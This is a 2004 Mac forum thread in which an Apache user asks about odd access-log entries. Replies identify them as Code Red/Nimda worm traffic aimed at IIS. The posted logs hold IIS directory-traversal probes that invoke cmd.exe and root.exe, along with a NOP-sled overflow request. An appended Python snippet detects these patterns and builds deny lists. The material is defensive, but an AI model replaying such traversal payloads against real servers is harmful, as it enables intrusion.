Stupid windoz hackers... an annoyance, but should I be worried about my server?

Discussion in 'General Mac Discussion' started by walkingmac, Apr 5, 2004.

  1. walkingmac macrumors 6502

    walkingmac

    Joined:
    Mar 30, 2003
    Location:
    Greater Cincinnati
    #1
    ok... so I take advantage of the fact that I have Apache ready to use on my nice Mac OS X PowerMac and host my own website.

    I also like to know what is going on with my site and who is accessing what. So I have my access.log displayed on my desktop with *GeekTool*.

    Every so often I get blips like this that also send my CPU screaming for a few minutes:
    12.220.19.2 - - [05/Apr/2004:03:42:48 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\ ...and on and on a couple of thousand times... x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ ...like 10,000 more of these or so.... \x90\x90\x90" 414 363

    Is this a flood or something else?

    and I get these a lot:
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 300
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
    12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
    12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324

    I look up the IP address and it says this is somewhere in Lexington KY.
    Any help?
     
  2. Westside guy macrumors 601

    Westside guy

    Joined:
    Oct 15, 2003
    Location:
    The soggy side of the Pacific NW
    #2
    This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

    I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.
     
  3. walkingmac thread starter macrumors 6502

    walkingmac

    Joined:
    Mar 30, 2003
    Location:
    Greater Cincinnati
    #3
    OK, so the endless numbers that eat my CPU for a little bit are ALSO an M$ Webserver thing?
     
  4. tomf87 macrumors 65816

    tomf87

    Joined:
    Sep 10, 2003
    #4
    Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.
     
  5. Jeewhizz macrumors regular

    Joined:
    Nov 30, 2003
    Location:
    London, UK
  6. 7on macrumors 601

    7on

    Joined:
    Nov 9, 2003
    Location:
    Dress Rosa
    #6
    Would turning on the firewall stop such attacks from affecting CPU speed?
     
  7. tomf87 macrumors 65816

    tomf87

    Joined:
    Sep 10, 2003
    #7
    No because the firewall works on the port level (level 4) not level 5, so any port 80 request would be allowed through.
     
  8. Jeewhizz macrumors regular

    Joined:
    Nov 30, 2003
    Location:
    London, UK
    #8
    Depending on how you use it, you could just move Apache to, say, port 81, close port 80 on the firewall, and then access Apache via http://127.0.0.1:81/

    Jee
     
  9. walkingmac thread starter macrumors 6502

    walkingmac

    Joined:
    Mar 30, 2003
    Location:
    Greater Cincinnati
    #9
    It's not that it bothers me that it is logged (I like the fact that I can see what's going on, at least), rather that it is affecting my system's performance. I don't see the value in moving my port. Is it just that they are banging away at anything listening on 80 specifically, or is it through my website (which of course is on port 80)? How will moving my port to 81 affect my website? Would this then require something different from my current system of updating my IP address in the DNS? (Sorry, I don't know a whole lot about this stuff besides turning on and setting up services and making the websites :eek: )
     
  10. Jeewhizz macrumors regular

    Joined:
    Nov 30, 2003
    Location:
    London, UK
    #10
    Well, I only use Apache/MySQL on my PC atm for local testing - and for showing clients their work... so it's only accessed from outside the network when I give out a link - so I give out http://MY_IPADDRESS:81/client/index.php

    Moving to port 81 would stop most of it, as they will be scanning all IPs on port 80 - which would be blocked by your firewall.

    However, if you use your Mac as a server a lot, then moving to port 81 wouldn't be a good idea ;)
     
  11. Westside guy macrumors 601

    Westside guy

    Joined:
    Oct 15, 2003
    Location:
    The soggy side of the Pacific NW
    #11
    You're right; it's CodeRed. So it's a hacker once removed. :D

    I wouldn't worry so much about the system impact; but unfortunately if there's enough traffic it can certainly bog down your internet connection. There's not a lot you personally can do about that; and if you ask your ISP to do something about it they'll probably say "you know, you're not supposed to be running any sort of server on our lines". :p
     
  12. superbovine macrumors 68030

    superbovine

    Joined:
    Nov 7, 2003
    #12
    Google for how to make a host.deny file and add the IP to your host.deny file.
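
An added example (not code from this thread) that parses Apache common-log lines like the ones in post #1, labels the IIS cmd.exe/root.exe probes and the oversized \x90 SEARCH request separately, and turns the offending source IPs into the kind of deny list post #12 suggests; the sample lines, IPs and the \x90-run threshold are constructed for the demo.

```python
import re
from collections import Counter, defaultdict
# Constructed sample lines in Apache common log format, modelled on the thread's
# entries; IPs (documentation ranges) and timestamps are made up.
SAMPLE_LOG = r"""
192.0.2.10 - - [05/Apr/2004:03:42:48 -0400] "SEARCH /\x90\x02\xb1\x90\x90\x90\x90\x90\x90\x90\x90\x90 HTTP/1.1" 414 363
192.0.2.20 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
192.0.2.20 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
198.51.100.7 - - [05/Apr/2004:10:00:01 -0400] "GET /index.html HTTP/1.1" 200 1043
""".strip()
# Common log format: host ident user [time] "request" status bytes
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)$')
# Paths that only make sense on IIS: the worm's cmd.exe/root.exe traversal probes.
IIS_PROBE_RE = re.compile(r'cmd\.exe|root\.exe|\.\.%', re.IGNORECASE)
# Apache writes non-printable bytes as \xNN; a long run of \x90 is a NOP sled.
NOP_RUN_RE = re.compile(r'(?:\\x90){8,}')

def parse_line(line):
    """Return a dict for one CLF line, or None if it does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    ip, when, request, status, _ = m.groups()
    return {"ip": ip, "time": when, "request": request, "status": int(status)}

def classify(entry):
    """Label an entry 'overflow_attempt', 'iis_probe' or 'normal'."""
    if NOP_RUN_RE.search(entry["request"]) or entry["status"] == 414:
        return "overflow_attempt"          # oversized binary request
    if IIS_PROBE_RE.search(entry["request"]):
        return "iis_probe"                 # 404 on Apache: harmless but noisy
    return "normal"

def scan(log_text):
    """Map each source IP to a Counter of labels for its requests."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry:                          # skip unparseable lines
            per_ip[entry["ip"]][classify(entry)] += 1
    return per_ip

def offenders(log_text):
    """Sorted IPs that sent at least one probe or overflow attempt."""
    return sorted(ip for ip, c in scan(log_text).items()
                  if c["iis_probe"] or c["overflow_attempt"])

def deny_lines(ips, style="hosts.deny"):
    """Render a block list as TCP Wrappers 'ALL: ip' or Apache 'Deny from ip'."""
    fmt = "ALL: {}" if style == "hosts.deny" else "Deny from {}"
    return [fmt.format(ip) for ip in ips]
```

Note that hosts.deny only governs services that consult TCP Wrappers, which a stock Apache does not, so the same list is more useful in an Apache `Deny from` directive or a firewall rule; and since worm traffic arrives from constantly changing infected hosts, per-IP blocking mostly trims the log rather than the load.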
     